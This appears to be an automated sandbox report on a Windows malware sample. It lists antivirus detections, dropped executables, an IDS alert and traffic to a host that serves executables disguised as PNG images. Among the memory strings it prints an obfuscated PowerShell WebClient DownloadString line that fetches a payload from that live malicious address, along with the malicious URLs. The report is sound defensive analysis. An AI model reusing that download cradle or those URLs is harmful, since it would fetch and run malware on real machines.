              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-18T13:49:11.657939+010028033053Unknown Traffic192.168.2.649715176.113.115.17880TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://176.113.115.178/FF/1.pngAvira URL Cloud: Label: malware
              Source: http://176.113.115.178/FF/3.pngAvira URL Cloud: Label: malware
              Source: http://176.113.115.178/FF/M.pngAvira URL Cloud: Label: malware
              Source: http://176.113.115.178/FF/2.pngAvira URL Cloud: Label: malware
              Source: http://176.113.115.178/FF/CMD.pngAvira URL Cloud: Label: malware
              Multi AV Scanner detection for dropped file
              Source: C:\ProgramData\Mig\Mig.exeReversingLabs: Detection: 63%
              Source: C:\Users\user\AppData\Roaming\LB31.exeReversingLabs: Detection: 63%
              Multi AV Scanner detection for submitted file
              Source: file.exeReversingLabs: Detection: 65%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Roaming\LB31.exeJoe Sandbox ML: detected
              Source: C:\ProgramData\Mig\Mig.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: 56ad364e35\System.Management.Automation.pdb\D source: powershell.exe, 00000007.00000002.2296695462.000001CF7B041000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32%%(N%%ew-O%%%bje%%%ctN%%%et.W%%%e';$c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%';$c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3-Join'');$TC=$TC.replace source: powershell.exe, 00000007.00000002.2293866711.000001CF7AE00000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000007.00000002.2296695462.000001CF7B041000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows source: powershell.exe, 00000007.00000002.2296695462.000001CF7B041000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.resourcesn.pdb source: powershell.exe, 00000007.00000002.2296695462.000001CF7B041000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: LB31.exe, Mig.exe
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb$ source: powershell.exe, 00000007.00000002.2293660004.000001CF7ADAE000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001DCB14EDCE0 FindFirstFileExW,16_2_000001DCB14EDCE0
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 19_2_000002246446DCE0 FindFirstFileExW,19_2_000002246446DCE0
              Source: C:\Windows\System32\winlogon.exeCode function: 54_2_000002D0165EDCE0 FindFirstFileExW,54_2_000002D0165EDCE0
              Source: C:\Windows\System32\lsass.exeCode function: 62_2_000002D6F151DCE0 FindFirstFileExW,62_2_000002D6F151DCE0
              Source: C:\Windows\System32\svchost.exeCode function: 63_2_0000014E41FDDCE0 FindFirstFileExW,63_2_0000014E41FDDCE0
              Source: C:\Windows\System32\dwm.exeCode function: 64_2_000001D15B05DCE0 FindFirstFileExW,64_2_000001D15B05DCE0

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Downloads files with wrong headers with respect to MIME Content-Type
              Source: httpImage file has PE prefix: HTTP/1.1 200 OK Content-Type: image/png Last-Modified: Sun, 06 Oct 2024 18:12:58 GMT Accept-Ranges: bytes ETag: "08ec05f1b18db1:0" Server: Microsoft-IIS/10.0 Date: Wed, 18 Dec 2024 12:49:44 GMT Content-Length: 7679488 Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 68 72 ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 07 00 5e 6e f4 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 a0 00 00 00 78 54 00 00 00 00 00 00 d0 af 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 af 00 00 04 00 00 fe e2 75 00 02 00 60 80 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8d 90 55 00 b5 00 00 00 00 e0 53 00 66 a3 01 00 20 e0 af 00 98 01 00 00 00 00 00 00 00 00 00 00 c0 22 ae 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 22 ae 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 53 00 00 10 00 00 00 0c 52 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 66 a3 01 00 00 e0 53 00 00 a4 01 00 00 1c 52 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 55 00 00 02 00 00 00 c0 53 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 38 00 00 a0 55 00 00 02 00 00 00 c2 53 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 64 72 79 75 6a 6d 70 00 70 21 00 00 60 8e 00 00 66 21 00 00 c4 53 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 6e 79 75 64 67 75 75 00 10 00 00 00 d0 af 00 00 02 00 00 00 2a 75 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 70 64 61 74 61 00 49 00 10 00 00 00 e0 af 00 00 02 00 00 00 2c 75 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: image/pngLast-Modified: Sun, 06 Oct 2024 18:12:58 GMTAccept-Ranges: bytesETag: "08ec05f1b18db1:0"Server: Microsoft-IIS/10.0Date: Wed, 18 Dec 2024 12:49:44 GMTContent-Length: 7679488Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 68 72 ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 07 00 5e 6e f4 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 a0 00 00 00 78 54 00 00 00 00 00 00 d0 af 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 af 00 00 04 00 00 fe e2 75 00 02 00 60 80 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8d 90 55 00 b5 00 00 00 00 e0 53 00 66 a3 01 00 20 e0 af 00 98 01 00 00 00 00 00 00 00 00 00 00 c0 22 ae 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 22 ae 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 53 00 00 10 00 00 00 0c 52 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 66 a3 01 00 00 e0 53 00 00 a4 01 00 00 1c 52 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 55 00 00 02 00 00 00 c0 53 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 38 00 00 a0 55 00 00 02 00 00 00 c2 53 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 64 72 79 75 6a 6d 70 00 70 21 00 00 60 8e 00 00 66 21 00 00 c4 53 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 6e 79 75 64 67 75 75 00 10 00 00 00 d0 af 00 00 02 00 00 00 2a 75 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 70 64 61 74 61 00 49 00 10 00 00 00 e0 af 00 00 02 00 00 00 2c 75 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: GET /FF/3.png HTTP/1.1Host: 176.113.115.178Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /FF/2.png HTTP/1.1Host: 176.113.115.178Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /FF/CMD.png HTTP/1.1Host: 176.113.115.178
              Source: global trafficHTTP traffic detected: GET /FF/1.png HTTP/1.1Host: 176.113.115.178Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /FF/M.png HTTP/1.1Host: 176.113.115.178Connection: Keep-Alive
              Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49715 -> 176.113.115.178:80
              Source: global trafficHTTP traffic detected: GET /Windows-Update HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 176.113.115.178Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Windows-Update/ HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 176.113.115.178Connection: Keep-Alive
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
              Source: global trafficHTTP traffic detected: GET /FF/3.png HTTP/1.1Host: 176.113.115.178Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /FF/2.png HTTP/1.1Host: 176.113.115.178Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /FF/CMD.png HTTP/1.1Host: 176.113.115.178
              Source: global trafficHTTP traffic detected: GET /Windows-Update HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 176.113.115.178Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Windows-Update/ HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 176.113.115.178Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /FF/1.png HTTP/1.1Host: 176.113.115.178Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /FF/M.png HTTP/1.1Host: 176.113.115.178Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0Date: Wed, 18 Dec 2024 12:49:10 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 7
              Source: wscript.exe, 00000004.00000003.2189720210.000001D049241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115
              Source: powershell.exe, 00000005.00000002.2240161447.0000015F81670000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2240161447.0000015F81631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2232422986.000001CF63F3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2232422986.000001CF63B21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2689152499.0000026801668000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2689152499.00000268019D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2689152499.0000026801631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178
              Source: powershell.exe, 00000007.00000002.2232422986.000001CF6414E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/FF/
              Source: powershell.exe, 0000000F.00000002.2872624047.0000026877EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2876638902.0000026878250000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/FF/1.png
              Source: mshta.exe, 0000000C.00000003.2298065296.000002AECCF85000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2298938783.000002AECCF86000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2299398377.000002AECCF87000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2296225919.000002AECCF83000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2299546441.000002AECCF89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/FF/1.png$TC=$TC.replace(
              Source: powershell.exe, 0000000F.00000002.2689152499.0000026800C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/FF/1.pngX
              Source: wscript.exe, 00000009.00000002.2255456357.0000022C1EE10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/FF/2.png
              Source: wscript.exe, 00000004.00000003.2188071581.000001D049241000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2187242940.000001D049241000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2194375546.000001D049241000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2189720210.000001D049241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/FF/2.png%http://176.113.115.178/FF/3.png%$
              Source: wscript.exe, 00000004.00000002.2192682749.000001D04750E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/FF/2.png6
              Source: powershell.exe, 00000005.00000002.2240161447.0000015F80C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/FF/2.pngX
              Source: wscript.exe, 00000009.00000003.2252120336.0000022C1EEBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/FF/3.png
              Source: powershell.exe, 00000007.00000002.2232422986.000001CF63B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/FF/3.pngX
              Source: powershell.exe, 00000005.00000002.2240161447.0000015F81670000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/FF/CMD.png
              Source: powershell.exe, 0000000F.00000002.2689152499.000002680166F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/FF/M.png
              Source: wscript.exe, wscript.exe, 00000009.00000003.2254332186.0000022C20CA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2254285588.0000022C20C91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows
              Source: mshta.exe, 0000000C.00000002.2308601542.000002A6CAB14000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2310783171.000002AED14F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2308571523.000002A6CAB0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2287264466.000002AECD0F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2287051707.000002A6CAB0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2290150546.000002AECD0F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-Update
              Source: mshta.exe, 0000000C.00000003.2286360520.000002A6CAB46000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2308601542.000002A6CAB46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-Update$E
              Source: wscript.exe, 00000009.00000002.2255820509.0000022C1EE8A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2253868783.0000022C1EE8A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2254057119.0000022C1EE8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-Update&
              Source: mshta.exe, 0000000C.00000003.2294382542.000002A6CAB0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2308571523.000002A6CAB0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2287051707.000002A6CAB0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-Update-
              Source: mshta.exe, 0000000C.00000003.2290150546.000002AECD0F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-Update/
